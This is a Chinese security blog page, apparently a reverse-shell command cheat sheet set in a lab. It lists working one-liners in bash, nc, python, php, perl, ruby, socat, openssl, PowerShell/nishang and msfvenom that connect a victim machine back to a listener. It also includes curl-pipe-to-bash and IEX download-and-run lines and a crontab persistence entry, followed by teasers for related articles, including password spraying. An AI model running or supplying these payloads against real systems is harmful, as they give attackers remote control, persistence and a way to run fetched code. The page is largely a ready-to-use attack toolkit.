<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    反彈shell命令速查

    VSole2022-07-28 06:13:42
    一、反彈Shell-Linux
    【監聽端】centos: 192.168.35.152
    【被控端】kali: 192.168.35.128
        
    # 監聽端執行
    [root@localhost ~]# nc -vvl 7777
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::7777
    Ncat: Listening on 0.0.0.0:7777
    

    1、bash

    ┌──(root@kali)-[/home/kali]
    └─# bash -i >& /dev/tcp/192.168.35.152/7777 0>&1     # 執行失敗                                   
    zsh: 沒有那個文件或目錄: /dev/tcp/192.168.35.152/7777 
    

    2、bash base64

    # /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
    bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA==}|{base64,-d}|{bash,-i}'
    

    3、bash base64 URLencode

    # /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
    bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA%3D%3D}|{base64,-d}|{bash,-i}'
    

    4、nc

    nc -e /bin/bash 192.168.35.152 7777
    mknod backpipe p && nc 192.168.35.152 7777 01
    >backpipe rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.35.152 7777 >/tmp/f
    

    5、ncat

    ncat  192.168.35.152 7777 -e /bin/bash
    ncat --udp 192.168.35.152 7777 -e /bin/bash
    

    6、curl

    # kali開啟http服務,把bash命令寫入html文件
    cat bash.html
    /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
    # centos
    curl 192.168.35.152/bash.html|bash
    

    7、http

    攻擊方:
    # 編寫shell腳本并啟動http服務器
    echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.sh
    python2環境下:python -m SimpleHTTPServer 80
    python3環境下:python -m http.server 80
    被控端:
    # 上傳shell.sh文件
    wget 192.168.35.152/shell.sh
    # 執行shell.sh文件
    bash shell.sh
    

    8、crontab

    * * * * * root bash -i >& /dev/tcp/192.168.35.152/7777  0>&1
    

    9、whois

    # 只能執行指定命令,如pwd命令
    whois -h 192.168.35.152 -p 7777 `pwd` /python
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.35.152",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    

    10、php

    php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
    

    11、ruby

    ruby -rsocket -e'f=TCPSocket.open("192.168.35.152",7777).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'  # 執行失敗
    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.35.152","7777");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
    

    12、socat

    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.35.152:7777
    

    13、perl

    perl -e 'use Socket;$i="192.168.35.152";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    

    14、php

    php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
    

    15、openssl

    # 監聽端
    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
    openssl s_server -quiet -key key.pem -cert cert.pem -port 7777
    # or
    ncat --ssl -vv -l -p 7777
    # 受控端
    mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.35.152:7777 > /tmp/s; rm /tmp/s
    

    二、反彈Shell-Windows

    Windows下的反彈shell僅測試了nc,執行成功。
    【監聽端】centos: 192.168.35.152
    【被控端】windows: 192.168.35.1
        
    # 監聽端執行
    [root@localhost ~]# nc -vvl 7777
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::7777
    Ncat: Listening on 0.0.0.0:7777
    

    1、powercat

    項目地址:https://github.com/besimorhino/powercat
    System.Net.Webclient.DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.35.152 -p 7777 -e cmd
    

    2、nc

    nc 192.168.35.152 7777 -e c:\windows\system32\cmd.exe
    

    3、nishang

    Nishang是一個基于PowerShell的攻擊框架,整合了一些PowerShell攻擊腳本和有效載荷,可反彈TCP/ UDP/ HTTP/HTTPS/ ICMP等類型shell。
    項目地址:https://github.com/samratashok/nishang
    # 將nishang下載到攻擊者本地,在目標機使用powershell執行以下命令
    IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.35.152 -port 7777
    

    4、Reverse UDP shell

    IEX (New-Object Net.WebClient).DownloadString('http://192.168.35.152/nishang/Shells/Invoke-PowerShellUdp.ps1');
    Invoke-PowerShellUdp -Reverse -IPAddress 192.168.35.152 -port 7777
    

    5、MSF

    # 找出各類反彈一句話payload的路徑信息msfvenom -l payloads | grep 'cmd/windows/reverse'
    # 生成反彈shell,復制粘貼到靶機上運行msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.35.152 LPORT=7777
    
    shellbash
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    初識Shell
    2022-03-11 22:42:44
    程序是由序列組成的,告訴計算機如何完成一個具體的任務。編寫程序花費的時間往往是實際運行時間的幾十倍或幾百倍。除了計算機生產廠家的專業人員外,絕大多數的 程序員已經不再去學習機器語言了。包含的功能幾乎可以涵蓋Shell所具有的功能,所以一般的Shell腳本都會指定它為執行路徑。目前使用的 并不多,已經被/bin/tcsh所取代。
    # 此時攻擊機已經獲取到了bash$ python -c 'import pty; pty.spawn'$ ctrl + z //快捷鍵。$ fg$ reset //這一步我實測有問題,輸了會出問題,不輸也沒有影響,所以如果輸了有問題可以不輸。低權限提權首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Databas
    0x01 Apereo cas簡介Apereo CAS 單點登陸系統是Java服務器環境下使用較為廣泛的單點登陸系統。CAS 全程Central Authentication Service,是一個單點登錄協議,Apereo CAS是實現該協議的軟件包。Apereo CAS 4.1.X~4.1.6 默認密鑰Apereo CAS 4.1.7~4.2.X KEY隨機生成0x03漏洞利用與復現Webflow中使用了默認密鑰changeit,所以我們就可以利用默認密鑰生成序列化對象。
    本文記錄從零開始搭建F5 BIG-IP漏洞調試環境的細節。
    驗證子域郵箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源滲透物理滲透、物理攻擊、近源滲透,這幾個的意思都是在接近目標進行安全測試。Wi-Fi網線沒有終端準入控制,直接插網線 DHCP 獲取 IP。Bad USBBlack Hat 上提出 Bad USB。社會工程學在信息收集過程中就開始。釣魚本質是利用人的信任。Windows 主機FTP服務端開啟 FTP 服務。使用 certutil 下載的文件會原封不動在?目錄下保存一份,文件名位隨機字符,使用 delete 可以刪除剛下載的緩存。
    從Heartbleed到Apache Struts再到SolarWinds,這些是過去10年來發生的分水嶺式的網絡安全事件。嚴重的漏洞、廣泛的網絡攻擊已經改變了網絡安全的許多方面。為了回顧過去10年發生的安全事件,網絡安全供應商Trustwave公司日前發表了一篇名為《十年回顧:漏洞狀態》的博客文章,其中列出了過去10年中最突出和最值得注意的10個網絡安全問題和違規行為。
    AFL--模糊測試使用淺析
    靶場Kioptrix Level 1攻略
    2022-04-21 13:47:27
    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。
    剛入行時在網上搜各種工具使用技巧及方法,通過別人的經驗提高自身的技巧,然后再拿個小本本記錄,這是每個網安人初入行時的必備姿勢,那么今天丹丹就拿起先前做過的筆記和網上別人的經驗做一個合集,把大部分使用到的工具技巧整理成冊,后續自己以及大家查閱,如總結不到位的地方希望海涵,那現在就開始吧。。。。。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类